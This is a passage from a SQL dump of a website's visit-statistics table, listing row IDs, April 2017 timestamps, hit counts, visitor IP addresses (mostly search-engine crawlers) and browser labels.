,1,1,0,0,'217.182.132.151','other'),(102713,1492825695,1,1,0,0,'217.182.132.63','other'),(102714,1492826836,1,1,0,0,'164.132.161.48','other'),(102715,1492826851,1,1,0,0,'137.74.207.102','other'),(102716,1492827321,1,1,0,0,'217.69.133.190','other'),(102717,1492827331,1,1,0,0,'217.182.132.16','other'),(102718,1492828441,1,1,0,0,'137.74.203.194','other'),(102719,1492829587,1,1,0,0,'217.182.132.22','other'),(102720,1492830234,2,0,2,0,'66.249.76.27',''),(102721,1492830476,1,1,0,0,'217.69.133.70','other'),(102722,1492830826,1,1,0,0,'164.132.161.45','other'),(102723,1492830930,1,1,0,0,'66.249.76.108','chrome'),(102724,1492831388,1,1,0,0,'207.46.13.43','other'),(102725,1492831496,1,0,1,0,'66.249.76.28',''),(102726,1492831606,1,1,0,0,'217.182.132.84','other'),(102727,1492832326,2,2,0,0,'164.132.162.187','other'),(102728,1492832396,1,1,0,0,'51.255.65.48','other'),(102729,1492832792,1,1,0,0,'51.255.65.65','other'),(102730,1492833357,1,1,0,0,'216.244.66.237','other'),(102731,1492833507,1,0,1,0,'157.55.39.221',''),(102732,1492834409,1,1,0,0,'164.132.162.160','other'),(102733,1492834484,1,1,0,0,'164.132.161.92','other'),(102734,1492834588,1,1,0,0,'8.29.198.26','other'),(102735,1492834597,1,1,0,0,'217.69.133.193','other'),(102736,1492834620,1,1,0,0,'217.182.132.50','other'),(102737,1492834915,1,0,1,0,'66.249.76.27',''),(102738,1492834933,1,1,0,0,'217.182.132.34','other'),(102739,1492835275,1,1,0,0,'217.69.136.205','other'),(102740,1492835276,1,1,0,0,'217.69.136.204','other'),(102741,1492835305,1,0,1,0,'66.249.66.177',''),(102742,1492835529,1,1,0,0,'66.249.76.109','chrome'),(102743,1492835650,1,1,0,0,'164.132.161.35','other'),(102744,1492835674,1,0,1,0,'66.249.76.107',''),(102745,1492836106,1,0,1,0,'66.249.66.87',''),(102746,1492836255,1,1,0,0,'51.255.65.96','other'),(102747,1492836314,1,1,0,0,'217.69.133.241','other'),(102748,1492836424,2,2,0,0,'164.132.161.97','other'),(102749,1492836432,1,1,0,0,'51.255.65.67','other'),(102750,1492836843,1,1,0,0,'51.255.71.111','other'),(102751,1492836977,1,1,0,0,'164.132.161.37','other'),(102752,1492837026,1,0,1,0,'66.249.76.29',''),(102753,1492837059,1,1,0,0,'216.244.66.237','other'),(102755,1492837490,1,1,0,0,'164.132.161.87','other'),(102756,1492837532,4,4,0,0,'144.76.38.40','other'),(102757,1492838823,1,1,0,0,'51.255.65.32','other'),(102758,1492839291,1,1,0,0,'217.182.132.25','other'),(102759,1492839312,1,1,0,0,'217.182.132.68','other'),(102760,1492839374,1,1,0,0,'78.111.190.94','opera'),(102761,1492839424,1,1,0,0,'164.132.161.76','other'),(102762,1492839501,1,1,0,0,'164.132.161.45','other'),(102763,1492839514,1,0,1,0,'66.249.76.108',''),(102764,1492839549,1,1,0,0,'216.244.66.237','other'),(102765,1492839739,1,1,0,0,'217.182.132.19','other'),(102766,1492839883,1,1,0,0,'51.255.65.36','other'),(102767,1492840186,1,1,0,0,'217.182.132.84','other'),(102768,1492840597,1,1,0,0,'163.172.74.105','other'),(102769,1492840974,1,1,0,0,'164.132.161.49','other'),(102770,1492841085,1,1,0,0,'217.69.133.193','other'),(102771,1492841307,1,0,1,0,'66.249.66.177',''),(102772,1492841397,1,1,0,0,'51.255.71.112','other'),(102773,1492841584,1,1,0,0,'164.132.161.6','other'),(102774,1492841864,1,1,0,0,'217.182.132.186','other'),(102775,1492841984,1,1,0,0,'51.255.65.73','other'),(102776,1492842066,1,1,0,0,'164.132.161.47','other'),(102777,1492842225,1,0,1,0,'66.249.76.29',''),(102778,1492842533,1,1,0,0,'37.204.205.108','firefox'),(102779,1492842536,1,1,0,0,'94.180.130.196','chrome'),(102780,1492842574,1,0,1,0,'66.249.66.177',''),(102781,1492842823,1,1,0,0,'217.182.132.76','other'),(102782,1492843061,1,1,0,0,'164.132.161.4','other'),(102783,1492843070,1,1,0,0,'217.182.132.25','other'),(102784,1492843505,1,1,0,0,'66.249.76.29','chrome'),(102785,1492844234,1,1,0,0,'66.249.93.157','chrome'),(102786,1492844361,1,1,0,0,'164.132.161.51','other'),(102787,1492844458,1,1,0,0,'217.69.133.69','other'),(102788,1492844535,1,1,0,0,'66.249.76.107','chrome'),(102789,1492845130,1,1,0,0,'217.182.132.193','other'),(102790,1492845416,1,1,0,0,'8.29.198.25','other'),(102791,1492845429,1,1,0,0,'217.69.133.192','other'),(102792,1492845647,1,1,0,0,'164.132.161.53','other'),(102793,1492846131,1,1,0,0,'164.132.161.74','other'),(102794,1492846422,1,1,0,0,'66.249.76.29','chrome'),(102795,1492846868,1,1,0,0,'51.255.71.112','other'),(102796,1492847486,1,1,0,0,'185.26.182.35','opera'),(102797,1492848085,1,0,1,0,'66.249.76.107',''),(102798,1492848267,1,1,0,0,'91.209.11.236','other'),(102799,1492848444,1,1,0,0,'178.255.215.94','other'),(102800,1492848921,1,0,1,0,'207.46.13.42',''),(102801,1492848942,1,1,0,0,'51.255.65.87','other'),(102802,1492848999,1,1,0,0,'217.182.132.22','other'),(102803,1492849003,1,1,0,0,'130.180.219.155','opera'),(102804,1492849147,1,0,1,0,'66.249.76.28',''),(102805,1492849339,1,1,0,0,'217.182.132.4','other'),(102806,1492850003,1,1,0,0,'137.74.201.99','other'),(102807,1492850087,1,1,0,0,'137.74.207.120','other'),(102808,1492850375,1,1,0,0,'51.255.71.114','other'),(102809,1492850516,1,1,0,0,'164.132.161.49','other'),(102810,1492851171,1,1,0,0,'207.46.13.43','other'),(102811,1492851414,1,1,0,0,'37.55.56.17','chrome'),(102812,1492852799,1,1,0,0,'176.213.150.210','chrome'),(102813,1492853026,1,1,0,0,'217.182.132.29','other'),(102814,1492853274,1,1,0,0,'176.31.231.10','other'),(102815,1492853356,1,1,0,0,'217.182.132.64','other'),(102816,1492853397,1,1,0,0,'69.30.211.2','other'),(102817,1492853924,1,1,0,0,'216.244.66.237','other'),(102818,1492854062,1,1,0,0,'180.76.15.8','other'),(102819,1492854219,1,1,0,0,'217.182.132.32','other'),(102820,1492854564,1,1,0,0,'66.249.76.109','chrome'),(102821,1492854975,1,0,1,0,'66.249.76.29',''),(102822,1492855505,1,0,1,0,'66.249.76.28',''),(102823,1492855714,1,0,1,0,'66.249.76.27',''),(102824,1492855954,1,0,1,0,'66.249.76.107',''),(102825,1492856063,1,1,0,0,'217.182.132.193','other'),(102826,1492856074,1,1,0,0,'217.69.133.243','other'),(102827,1492856240,1,0,1,0,'66.249.66.87',''),(102828,1492856242,1,1,0,0,'8.29.198.26','other'),(102829,1492856978,1,1,0,0,'217.182.132.69','other'),(102830,1492857636,1,1,0,0,'217.69.133.217','other'),(102831,1492859057,1,0,1,0,'66.249.66.177',''),(102832,1492859321,1,1,0,0,'91.196.178.163','chrome'),(102833,1492859465,1,1,0,0,'164.132.161.83','other'),(102834,1492859503,1,1,0,0,'217.182.132.90','other'),(102835,1492859693,1,1,0,0,'217.182.132.155','other'),(102836,1492860010,1,1,0,0,'51.255.65.80','other'),(102837,1492860269,1,1,0,0,'217.182.132.77','other'),(102838,1492860391,1,0,1,0,'66.249.76.109',''),(102839,1492860676,1,1,0,0,'51.255.71.116','other'),(102840,1492860892,1,1,0,0,'141.8.142.154','other'),(102841,1492860898,1,1,0,0,'141.8.142.164','other'),(102842,1492861022,1,1,0,0,'66.249.76.107','chrome'),(102843,1492861178,1,1,0,0,'51.255.65.16','other'),(102844,1492861239,1,1,0,0,'51.255.65.26','other'),(102845,1492861255,1,1,0,0,'40.77.167.50','other'),(102846,1492861657,1,0,1,0,'66.249.76.28',''),(102847,1492861970,1,1,0,0,'217.69.133.246','other'),(102848,1492862679,1,1,0,0,'217.69.133.11','other'),(102849,1492862962,1,0,1,0,'66.249.66.180',''),(102850,1492863080,1,0,1,0,'66.249.76.29',''),(102851,1492863446,1,1,0,0,'217.182.132.150','other'),(102852,1492864097,1,1,0,0,'164.132.161.95','other'),(102853,1492864123,1,1,0,0,'66.249.76.107','chrome'),(102854,1492864471,1,1,0,0,'51.255.65.48','other'),(102855,1492864844,1,1,0,0,'51.255.65.73','other'),(102856,1492865235,1,1,0,0,'51.255.65.79','other'),(102857,1492865311,1,1,0,0,'164.132.161.26','other'),(102858,1492865986,1,1,0,0,'51.255.65.25','other'),(102859,1492866219,1,1,0,0,'51.255.65.5','other'),(102860,1492866509,1,1,0,0,'82.145.222.223','other'),(102861,1492866679,1,0,1,0,'66.249.76.107',''),(102862,1492867051,1,1,0,0,'51.255.65.2','other'),(102863,1492867067,1,1,0,0,'8.29.198.26','other'),(102864,1492867226,1,1,0,0,'216.244.66.246','other'),(102865,1492867542,1,1,0,0,'51.255.71.112','other'),(102866,1492867687,1,1,0,0,'164.132.161.3','other'),(102867,1492868378,1,1,0,0,'51.255.65.95','other'),(102868,1492868766,1,1,0,0,'164.132.161.93','other'),(102869,1492868787,1,1,0,0,'164.132.161.95','other'),(102870,1492868909,1,0,1,0,'66.249.76.29',''),(102871,1492868997,1,1,0,0,'51.255.65.65','other'),(102872,1492869226,1,1,0,0,'217.182.132.172','other'),(102873,1492869817,1,0,1,0,'66.249.66.81',''),(102874,1492870088,1,1,0,0,'164.132.161.54','other'),(102875,1492870115,1,1,0,0,'216.244.66.237','other'),(102876,1492870515,1,0,1,0,'66.249.66.180',''),(102877,1492870706,1,1,0,0,'51.255.65.19','other'),(102878,1492870801,1,1,0,0,'217.69.133.28','other'),(102879,1492871199,1,1,0,0,'217.69.133.68','other'),(102880,1492871508,1,1,0,0,'51.255.65.27','other'),(102881,1492872112,1,1,0,0,'217.182.132.85','other'),(102882,1492872186,1,1,0,0,'217.182.132.88','other'),(102883,1492872781,1,0,1,0,'66.249.66.81',''),(102884,1492873085,1,1,0,0,'217.182.132.50','other'),(102885,1492873168,1,1,0,0,'216.244.66.237','other'),(102886,1492873178,1,1,0,0,'51.255.65.35','other'),(102887,1492873341,2,2,0,0,'216.244.66.246','other'),(102888,1492873441,1,1,0,0,'137.74.207.164','other'),(102889,1492873673,1,1,0,0,'217.182.132.30','other'),(102890,1492873679,1,1,0,0,'164.132.161.55','other'),(102891,1492875665,1,1,0,0,'164.132.161.79','other'),(102892,1492875893,1,1,0,0,'217.182.132.53','other'),(102893,1492876265,1,1,0,0,'207.46.13.165','other'),(102894,1492876495,1,1,0,0,'217.182.132.154','other'),(102895,1492876825,1,1,0,0,'51.255.65.93','other'),(102896,1492876861,1,1,0,0,'51.255.65.24','other'),(102897,1492877022,1,1,0,0,'217.69.133.194','other'),(102898,1492877392,1,1,0,0,'164.132.162.156','other'),(102899,1492877903,1,1,0,0,'8.29.198.27','other'),(102900,1492878685,1,1,0,0,'51.255.65.36','other'),(102901,1492878710,1,1,0,0,'51.255.65.2','other'),(102902,1492878908,1,1,0,0,'216.244.66.237','other'),(102903,1492879012,1,1,0,0,'217.69.133.245','other'),(102904,1492879597,1,1,0,0,'91.196.178.40','chrome'),(102905,1492879756,1,0,1,0,'66.249.76.28',''),(102906,1492880013,1,1,0,0,'51.255.65.6','other'),(102907,1492880498,1,1,0,0,'78.111.185.162','opera'),(102908,1492880803,1,1,0,0,'178.255.215.94','other'),(102909,1492881027,2,2,0,0,'130.180.209.227','chrome'),(102910,1492881486,1,1,0,0,'130.180.209.30','chrome'),(102911,1492881614,1,1,0,0,'137.74.201.100','other'),(102912,1492881920,1,1,0,0,'164.132.161.58','other'),(102913,1492882340,1,1,0,0,'51.255.65.24','other'),(102914,1492882405,1,1,0,0,'92.112.248.133','chrome'),(102915,1492882450,1,1,0,0,'217.182.132.149','other'),(102916,1492882773,1,1,0,0,'164.132.161.25','other'),(102917,1492882825,1,1,0,0,'141.8.142.154','other'),(102918,1492884262,1,1,0,0,'51.255.71.118','other'),(102919,1492884365,1,1,0,0,'130.180.217.138','opera'),(102920,1492884889,1,1,0,0,'217.182.132.24','other'),(102921,1492885540,1,1,0,0,'51.255.65.15','other'),(102922,1492885558,1,1,0,0,'217.182.132.58','other'),(102923,1492885805,1,1,0,0,'217.69.133.226','other'),(102924,1492886167,1,0,1,0,'66.249.76.109',''),(102925,1492886827,1,0,1,0,'66.249.66.183',''),(102926,1492887188,1,1,0,0,'51.255.65.87','other'),(102927,1492887815,1,0,1,0,'207.46.13.165',''),(102928,1492888292,1,1,0,0,'89.36.213.222','other'),(102929,1492888731,1,1,0,0,'8.29.198.25','other'),(102930,1492888991,1,1,0,0,'51.255.65.88','other'),(102931,1492889305,1,1,0,0,'137.74.207.120','other'),(102932,1492890768,1,1,0,0,'217.182.132.60','other'),(102933,1492890913,1,0,1,0,'66.249.66.183',''),(102934,1492891302,3,3,0,0,'216.244.66.246','other'),(102935,1492891381,1,1,0,0,'51.255.65.80','other'),(102936,1492891633,1,1,0,0,'217.182.132.20','other'),(102937,1492892487,1,1,0,0,'217.69.133.14','other'),(102938,1492893140,1,1,0,0,'164.132.161.74','other'),(102939,1492893357,1,1,0,0,'51.255.65.13','other'),(102940,1492893481,1,1,0,0,'207.46.13.161','other'),(102941,1492893733,1,1,0,0,'51.255.71.111','other'),(102942,1492894445,1,1,0,0,'180.76.15.144','other'),(102943,1492894513,1,1,0,0,'164.132.161.76','other'),(102944,1492894809,1,1,0,0,'51.255.65.74','other'),(102945,1492895034,1,1,0,0,'51.255.65.88','other'),(102946,1492895346,1,1,0,0,'51.255.71.98','other'),(102947,1492895379,2,2,0,0,'212.252.56.69','other'),(102949,1492895621,1,1,0,0,'164.132.161.82','other'),(102950,1492896222,1,1,0,0,'51.255.65.5','other'),(102951,1492896414,1,1,0,0,'180.76.15.8','other'),(102952,1492897693,1,1,0,0,'164.132.161.37','other'),(102953,1492897823,1,1,0,0,'217.182.132.30','other'),(102954,1492898290,1,1,0,0,'164.132.161.31','other'),(102955,1492898403,1,1,0,0,'51.255.65.95','other'),(102956,1492898666,1,1,0,0,'51.255.65.46','other'),(102957,1492899413,1,1,0,0,'51.255.71.126','other'),(102958,1492899562,1,1,0,0,'8.29.198.26','other'),(102959,1492899612,1,1,0,0,'207.46.13.161','other'),(102960,1492899698,1,1,0,0,'217.69.133.193','other'),(102961,1492900077,1,0,1,0,'66.249.76.28',''),(102962,1492900827,1,1,0,0,'51.255.71.122','other'),(102963,1492901015,1,1,0,0,'51.255.65.85','other'),(102964,1492901074,1,1,0,0,'40.77.167.125','other'),(102965,1492901133,2,2,0,0,'188.226.142.120','other'),(102966,1492901147,1,1,0,0,'216.244.66.246','other'),(102967,1492901336,1,1,0,0,'51.255.71.119','other'),(102968,1492901764,1,1,0,0,'51.255.65.86','other'),(102969,1492902029,1,1,0,0,'164.132.162.154','other'),(102970,1492902072,3,3,0,0,'188.226.142.120','other'),(102971,1492902267,1,1,0,0,'180.76.15.150','other'),(102972,1492902478,1,1,0,0,'164.132.161.28','other'),(102973,1492902528,1,1,0,0,'164.132.162.156','other'),(102974,1492903729,1,1,0,0,'137.74.207.161','other'),(102975,1492904732,1,1,0,0,'207.46.13.165','other'),(102976,1492905077,1,1,0,0,'164.132.161.7','other'),(102977,1492905418,1,1,0,0,'164.132.161.80','other'),(102978,1492906064,1,1,0,0,'137.74.207.161','other'),(102979,1492906448,1,1,0,0,'164.132.161.89','other'),(102980,1492907028,1,1,0,0,'164.132.162.157','other'),(102981,1492909136,1,1,0,0,'37.9.113.43','other'),(102982,1492909227,1,1,0,0,'164.132.161.37','other'),(102983,1492909403,1,1,0,0,'216.244.66.237','other'),(102984,1492910393,1,1,0,0,'8.29.198.25','other'),(102985,1492910780,1,1,0,0,'164.132.161.50','other'),(102986,1492911252,1,1,0,0,'217.182.132.186','other'),(102987,1492911902,1,0,1,0,'66.249.76.108',''),(102988,1492912183,1,1,0,0,'51.255.65.93','other'),(102989,1492912939,1,1,0,0,'164.132.161.58','other'),(102990,1492913521,1,1,0,0,'66.249.76.29','chrome'),(102991,1492913704,1,1,0,0,'51.255.71.112','other'),(102992,1492913889,1,1,0,0,'217.182.132.147','other'),(102993,1492914170,1,1,0,0,'217.182.132.93','other'),(102994,1492914530,1,1,0,0,'217.182.132.173','other'),(102995,1492914828,1,1,0,0,'207.46.13.161','other'),(102996,1492915179,1,1,0,0,'51.255.65.8','other'),(102997,1492915404,1,1,0,0,'164.132.162.156','other'),(102998,1492915656,1,1,0,0,'217.182.132.35','other'),(102999,1492917167,1,1,0,0,'217.182.132.193','other'),(103000,1492917362,1,0,1,0,'40.77.167.125',''),(103001,1492917464,1,0,1,0,'66.249.76.109',''),(103002,1492917650,1,1,0,0,'164.132.162.156','other'),(103003,1492917750,1,1,0,0,'217.69.133.193','other'),(103004,1492917875,1,1,0,0,'66.249.76.29','chrome'),(103005,1492917929,1,1,0,0,'137.74.207.120','other'),(103006,1492918000,1,1,0,0,'217.182.132.86','other'),(103007,1492918142,1,1,0,0,'40.77.167.125','other'),(103008,1492918401,1,1,0,0,'217.182.132.58','other'),(103009,1492918430,1,1,0,0,'164.132.161.75','other'),(103010,1492920077,1,1,0,0,'217.182.132.150','other'),(103011,1492920100,1,1,0,0,'51.255.71.123','other'),(103012,1492920721,1,1,0,0,'217.182.132.175','other'),(103013,1492921220,1,1,0,0,'8.29.198.27','other'),(103014,1492921267,1,1,0,0,'164.132.161.92','other'),(103015,1492921586,1,1,0,0,'95.108.213.7','other'),(103016,1492921679,1,1,0,0,'217.182.132.150','other'),(103017,1492922314,1,1,0,0,'78.111.190.139','opera'),(103018,1492922600,1,1,0,0,'216.244.66.237','other'),(103019,1492922706,1,0,1,0,'66.249.76.27',''),(103020,1492923310,1,1,0,0,'217.182.132.58','other'),(103021,1492923653,1,1,0,0,'217.182.132.186','other'),(103022,1492923834,2,2,0,0,'207.46.13.165','other'),(103023,1492924532,1,1,0,0,'217.182.132.172','other'),(103024,1492924791,1,1,0,0,'217.69.133.216','other'),(103025,1492925028,1,1,0,0,'51.255.65.14','other'),(103026,1492925030,1,1,0,0,'78.111.190.167','opera'),(103027,1492926301,1,1,0,0,'51.255.71.131','other'),(103028,1492928045,1,1,0,0,'164.132.161.9','other'),(103029,1492928112,1,1,0,0,'51.255.65.81','other'),(103030,1492928563,1,1,0,0,'164.132.161.23','other'),(103031,1492928799,1,1,0,0,'137.74.207.161','other'),(103032,1492928862,1,1,0,0,'216.244.66.246','other'),(103033,1492928864,1,1,0,0,'217.182.132.15','other'),(103034,1492930208,1,1,0,0,'66.102.9.25','chrome'),(103035,1492931143,1,0,1,0,'66.249.66.84',''),(103036,1492931393,1,1,0,0,'217.182.132.177','other'),(103037,1492931729,1,0,1,0,'66.249.76.108',''),(103038,1492932049,1,1,0,0,'8.29.198.26','other'),(103039,1492933158,1,1,0,0,'51.255.71.133','other'),(103040,1492933472,1,1,0,0,'164.132.162.154','other'),(103041,1492933670,1,1,0,0,'164.132.161.5','other'),(103042,1492934075,1,1,0,0,'137.74.207.114','other'),(103043,1492934229,1,1,0,0,'137.74.207.188','other'),(103044,1492934603,1,1,0,0,'51.255.65.43','other'),(103045,1492934615,1,0,1,0,'66.249.66.183',''),(103046,1492934900,1,1,0,0,'217.182.132.50','other'),(103047,1492935858,1,1,0,0,'217.182.132.241','other'),(103048,1492936656,1,1,0,0,'217.182.132.148','other'),(103049,1492936696,1,1,0,0,'51.255.71.129','other'),(103050,1492936899,1,0,1,0,'66.249.76.107',''),(103051,1492937499,1,1,0,0,'217.69.133.169','firefox'),(103052,1492937686,1,1,0,0,'51.255.65.21','other'),(103053,1492938524,1,1,0,0,'51.255.65.68','other'),(103054,1492939304,1,0,1,0,'66.249.76.108',''),(103055,1492939810,1,1,0,0,'164.132.161.13','other'),(103056,1492939993,1,1,0,0,'51.255.71.118','other'),(103057,1492940366,1,1,0,0,'164.132.161.54','other'),(103058,1492940551,1,1,0,0,'164.132.161.91','other'),(103059,1492940746,1,1,0,0,'164.132.161.94','other'),(103060,1492942002,1,1,0,0,'217.182.132.16','other'),(103061,1492942601,1,1,0,0,'217.182.132.151','other'),(103062,1492942907,1,1,0,0,'8.29.198.25','other'),(103063,1492942929,1,1,0,0,'164.132.161.90','other'),(103064,1492943001,1,1,0,0,'217.182.132.186','other'),(103065,1492943795,1,1,0,0,'217.182.132.174','other'),(103066,1492943844,1,0,1,0,'66.249.76.29',''),(103067,1492943848,1,1,0,0,'164.132.161.75','other'),(103068,1492944078,2,2,0,0,'69.30.234.2','other'),(103069,1492944469,1,1,0,0,'164.132.161.32','other'),(103070,1492944806,1,1,0,0,'217.182.132.25','other'),(103071,1492945041,1,1,0,0,'137.74.207.164','other'),(103072,1492945123,1,1,0,0,'164.132.161.45','other'),(103073,1492945310,1,1,0,0,'164.132.161.82','other'),(103074,1492945696,1,1,0,0,'217.182.132.97','other'),(103075,1492946896,1,0,1,0,'66.249.76.108',''),(103076,1492947053,1,1,0,0,'217.182.132.175','other'),(103077,1492947502,1,1,0,0,'82.207.109.121','chrome'),(103078,1492947843,1,1,0,0,'217.182.132.185','other'),(103079,1492947956,1,1,0,0,'51.255.71.128','other'),(103080,1492948016,1,1,0,0,'178.94.172.118','chrome'),(103081,1492949796,1,1,0,0,'176.31.231.10','other'),(103082,1492949800,1,1,0,0,'217.182.132.150','other'),(103083,1492949918,1,1,0,0,'207.46.13.167','other'),(103084,1492950194,1,1,0,0,'164.132.161.60','other'),(103085,1492950243,1,1,0,0,'137.74.207.119','other'),(103086,1492950390,1,1,0,0,'51.255.65.48','other'),(103087,1492950632,1,0,1,0,'66.249.76.29',''),(103088,1492950728,1,1,0,0,'217.182.132.171','other'),(103089,1492952234,1,1,0,0,'216.244.66.246','other'),(103090,1492952451,1,1,0,0,'164.132.161.76','other'),(103091,1492952689,1,1,0,0,'217.182.132.52','other'),(103092,1492953747,1,1,0,0,'8.29.198.25','other'),(103093,1492953818,1,1,0,0,'51.255.71.122','other'),(103094,1492954050,1,1,0,0,'217.182.132.21','other'),(103095,1492954144,1,1,0,0,'164.132.161.47','other'),(103096,1492954224,1,1,0,0,'164.132.161.22','other'),(103097,1492954341,1,1,0,0,'51.255.65.29','other'),(103098,1492954595,1,1,0,0,'51.255.71.112','other'),(103099,1492955045,1,1,0,0,'130.180.217.74','opera'),(103100,1492956049,1,1,0,0,'207.46.13.125','other'),(103101,1492956145,1,1,0,0,'164.132.162.155','other'),(103102,1492956362,1,1,0,0,'164.132.161.42','other'),(103103,1492956369,1,1,0,0,'217.69.133.15','other'),(103104,1492956545,1,1,0,0,'141.8.142.15','other'),(103105,1492956565,1,1,0,0,'164.132.161.91','other'),(103106,1492957059,1,1,0,0,'164.132.161.69','other'),(103107,1492957061,1,1,0,0,'217.182.132.78','other'),(103108,1492957069,1,1,0,0,'178.154.189.22','other'),(103109,1492957092,1,1,0,0,'217.182.132.37','other'),(103110,1492957450,1,1,0,0,'207.46.13.151','other'),(103111,1492957561,1,1,0,0,'51.255.71.120','other'),(103112,1492957690,1,1,0,0,'217.182.132.73','other'),(103113,1492958894,1,1,0,0,'51.255.71.120','other'),(103114,1492959105,1,0,1,0,'66.249.66.180',''),(103115,1492959123,1,1,0,0,'217.182.132.29','other'),(103116,1492959362,1,1,0,0,'180.76.15.22','other'),(103117,1492959375,1,1,0,0,'151.80.27.116','other'),(103118,1492959449,1,1,0,0,'51.255.65.33','other'),(103119,1492959630,1,1,0,0,'217.182.132.56','other'),(103120,1492959712,1,1,0,0,'141.0.13.186','other'),(103121,1492959910,1,0,1,0,'66.249.76.28',''),(103122,1492960224,1,1,0,0,'216.244.66.246','other'),(103123,1492960347,1,1,0,0,'51.255.65.70','other'),(103124,1492960488,1,1,0,0,'164.132.164.180','other'),(103125,1492961600,1,1,0,0,'164.132.161.91','other'),(103126,1492961833,1,1,0,0,'207.46.13.151','other'),(103127,1492962550,1,1,0,0,'164.132.161.61','other'),(103128,1492962630,1,0,1,0,'207.46.13.167',''),(103129,1492962838,1,1,0,0,'91.196.178.165','chrome'),(103130,1492962962,1,1,0,0,'195.211.23.210','other'),(103131,1492962977,1,1,0,0,'91.196.178.69','chrome'),(103132,1492963012,1,1,0,0,'195.211.23.220','other'),(103133,1492963107,1,1,0,0,'216.244.66.237','other'),(103134,1492963229,1,0,1,0,'66.249.76.28',''),(103135,1492963471,1,1,0,0,'37.73.242.45','chrome'),(103136,1492963632,1,1,0,0,'91.196.178.98','chrome'),(103137,1492964108,1,0,1,0,'66.249.66.84',''),(103138,1492964572,1,1,0,0,'8.29.198.27','other'),(103139,1492964721,1,0,1,0,'66.249.66.210',''),(103140,1492964722,1,1,0,0,'164.132.161.2','other'),(103141,1492964866,1,1,0,0,'217.182.132.79','other'),(103142,1492965023,1,0,1,0,'66.249.76.28',''),(103143,1492965494,1,0,1,0,'66.249.76.29',''),(103144,1492965915,1,0,1,0,'66.249.76.109',''),(103145,1492966253,1,1,0,0,'91.196.178.98','chrome'),(103146,1492966743,1,1,0,0,'82.145.222.53','chrome'),(103147,1492966809,1,1,0,0,'164.132.161.13','other'),(103148,1492966870,1,1,0,0,'216.244.66.246','other'),(103149,1492967257,1,1,0,0,'51.255.71.126','other'),(103150,1492967879,1,1,0,0,'91.196.178.164','other'),(103151,1492967882,1,1,0,0,'78.111.190.122','opera'),(103152,1492968141,1,0,1,0,'66.249.66.202',''),(103153,1492968214,1,1,0,0,'216.244.66.237','other'),(103154,1492968482,1,1,0,0,'51.255.65.3','other'),(103155,1492969343,1,1,0,0,'51.255.65.48','other'),(103156,1492970641,1,1,0,0,'51.255.65.41','other'),(103157,1492971145,1,1,0,0,'95.132.63.126','chrome'),(103158,1492971197,1,0,1,0,'66.249.76.109',''),(103159,1492971268,1,1,0,0,'178.92.75.131','chrome'),(103160,1492971543,1,1,0,0,'51.255.71.131','other'),(103161,1492971718,1,1,0,0,'164.132.161.75','other'),(103162,1492971869,1,1,0,0,'137.74.207.102','other'),(103163,1492972219,1,1,0,0,'217.182.132.58','other'),(103164,1492972445,1,1,0,0,'164.132.161.97','other'),(103165,1492972519,1,1,0,0,'91.196.178.69','chrome'),(103166,1492972841,1,1,0,0,'217.182.132.190','other'),(103167,1492973656,1,1,0,0,'217.69.133.237','other'),(103168,1492973889,1,1,0,0,'217.69.133.14','other'),(103169,1492974228,1,1,0,0,'137.74.201.100','other'),(103170,1492974407,1,1,0,0,'164.132.161.23','other'),(103171,1492974561,1,1,0,0,'217.182.132.78','other'),(103172,1492975347,1,1,0,0,'51.255.65.87','other'),(103173,1492975397,1,1,0,0,'8.29.198.25','other'),(103174,1492975507,1,1,0,0,'164.132.161.44','other'),(103175,1492975739,1,1,0,0,'51.255.65.11','other'),(103176,1492976253,1,1,0,0,'51.255.65.5','other'),(103177,1492976256,1,1,0,0,'207.46.13.125','other'),(103178,1492976522,1,1,0,0,'51.255.65.97','other'),(103179,1492976581,2,2,0,0,'216.244.66.237','other'),(103180,1492976822,1,0,1,0,'66.249.76.28',''),(103181,1492977120,1,1,0,0,'164.132.161.18','other'),(103182,1492977522,1,1,0,0,'151.80.27.116','other'),(103183,1492978296,1,1,0,0,'176.8.227.182','firefox'),(103184,1492978341,1,1,0,0,'199.30.24.43','other'),(103185,1492979073,1,1,0,0,'91.196.178.165','other'),(103186,1492979284,1,1,0,0,'51.255.65.16','other'),(103187,1492979426,1,1,0,0,'51.255.65.76','other'),(103188,1492979468,1,1,0,0,'51.255.65.43','other'),(103189,1492979737,1,1,0,0,'151.80.27.118','other'),(103190,1492979859,1,1,0,0,'217.69.133.29','other'),(103191,1492980056,1,1,0,0,'164.132.161.86','other'),(103192,1492980458,1,0,1,0,'66.249.76.107',''),(103193,1492981100,1,1,0,0,'51.255.71.130','other'),(103194,1492981251,1,1,0,0,'51.255.65.54','other'),(103195,1492981655,1,1,0,0,'207.46.13.125','other'),(103196,1492982145,1,1,0,0,'51.255.71.118','other'),(103197,1492982626,1,1,0,0,'164.132.162.160','other'),(103198,1492983253,1,1,0,0,'46.37.208.116','other'),(103200,1492983527,1,1,0,0,'217.182.132.190','other'),(103201,1492983607,1,1,0,0,'51.255.65.75','other'),(103202,1492983679,1,1,0,0,'88.198.55.175','other'),(103203,1492984025,1,1,0,0,'51.255.71.128','other'),(103204,1492984067,1,1,0,0,'5.9.98.178','other'),(103205,1492984419,1,1,0,0,'217.182.132.92','other'),(103206,1492984528,1,1,0,0,'217.182.132.61','other'),(103207,1492984968,1,1,0,0,'5.9.98.178','other'),(103208,1492985108,1,1,0,0,'216.244.66.237','other'),(103209,1492985456,2,2,0,0,'217.182.132.36','other'),(103210,1492985869,1,1,0,0,'5.9.98.178','other'),(103211,1492986231,1,1,0,0,'8.29.198.25','other'),(103212,1492986401,1,0,1,0,'66.249.66.87',''),(103213,1492986776,1,1,0,0,'5.9.98.178','other'),(103214,1492987309,1,1,0,0,'217.69.133.69','other'),(103215,1492987375,1,1,0,0,'164.132.161.90','other'),(103216,1492987678,1,1,0,0,'5.9.98.178','other'),(103217,1492988623,1,1,0,0,'207.46.13.125','other'),(103218,1492989312,2,2,0,0,'95.213.141.126','opera'),(103219,1492991684,1,0,1,0,'207.46.13.173',''),(103220,1492992110,1,1,0,0,'217.182.132.179','other'),(103221,1492992270,1,1,0,0,'217.69.133.219','other'),(103222,1492993093,1,1,0,0,'217.182.132.156','other'),(103223,1492994298,2,2,0,0,'216.244.66.237','other'),(103224,1492994531,1,1,0,0,'216.244.66.246','other'),(103225,1492994793,1,1,0,0,'51.255.65.76','other'),(103226,1492994968,1,1,0,0,'217.182.132.32','other'),(103227,1492994996,1,1,0,0,'217.182.132.78','other'),(103228,1492995763,1,1,0,0,'164.132.161.74','other'),(103229,1492997063,1,1,0,0,'8.29.198.27','other'),(103230,1493000364,1,1,0,0,'180.76.15.154','other'),(103231,1493000710,1,1,0,0,'216.244.66.246','other'),